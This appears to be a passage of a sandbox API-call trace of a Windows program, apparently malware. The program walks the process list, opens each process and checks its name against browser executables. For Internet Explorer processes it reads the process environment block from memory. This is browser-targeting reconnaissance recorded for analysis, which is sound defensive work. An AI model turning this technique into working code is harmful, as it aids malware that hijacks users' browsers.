	[0223.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.832] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.832] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0223.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.833] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.833] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0223.834] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5854
	[0223.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.834] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0223.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.834] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.835] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0223.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.835] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.835] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0223.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5858
	[0223.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.836] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0223.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.836] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.837] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0223.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.837] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0223.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x585c
	[0223.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.838] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0223.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.838] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.839] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0223.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.839] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.839] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0223.840] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5860
	[0223.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.840] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0223.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.841] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.841] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0223.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.842] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.842] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0223.843] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5864
	[0223.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.843] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0223.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.843] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.844] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0223.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.844] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.844] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0223.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5868
	[0223.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.846] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0223.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.846] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.847] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0223.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.847] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.848] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0223.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x586c
	[0223.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.848] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0223.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.849] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.849] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0223.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.850] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0223.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5870
	[0223.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.851] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0223.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.851] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.852] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0223.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.852] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.852] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0223.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5874
	[0223.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.853] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0223.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.853] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.853] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0223.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.854] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.854] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0223.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5878
	[0223.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.855] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0223.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.855] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.855] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0223.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.856] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.856] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0223.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x587c
	[0223.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.858] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0223.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.869] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.870] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0223.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.871] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.871] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0223.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5880
	[0223.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.872] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0223.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.872] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.873] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0223.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.873] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.874] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0223.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5884
	[0223.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.875] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0223.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.875] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.876] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0223.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.877] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.877] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0223.878] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5888
	[0223.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.878] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0223.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.879] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.879] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0223.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.880] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.880] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0223.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x588c
	[0223.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.881] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0223.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.881] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0223.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.881] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0223.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.882] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.882] NtQueryInformationProcess (in: ProcessHandle=0x588c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0223.882] ReadProcessMemory (in: hProcess=0x588c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0223.882] ReadProcessMemory (in: hProcess=0x588c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0223.882] ReadProcessMemory (in: hProcess=0x588c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0223.882] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0223.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0223.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5890
	[0223.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.883] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0223.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.883] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0223.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.884] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0223.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.884] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.884] NtQueryInformationProcess (in: ProcessHandle=0x5890, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0223.884] ReadProcessMemory (in: hProcess=0x5890, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0223.884] ReadProcessMemory (in: hProcess=0x5890, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0223.884] ReadProcessMemory (in: hProcess=0x5890, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0223.884] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0223.885] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0223.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5894
	[0223.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.885] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0223.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.886] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.886] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0223.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.886] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.887] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0223.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5898
	[0223.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.887] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0223.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.888] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.888] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0223.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.888] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.889] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x589c
	[0223.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.889] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.890] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.890] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.890] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.891] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.891] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x58a0
	[0223.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.893] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.894] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.894] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.894] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.894] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.895] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x58a4
	[0223.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.895] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.896] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.896] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.896] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.896] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0223.897] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x58a8
	[0223.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.897] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0223.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.897] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.898] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0223.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.898] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
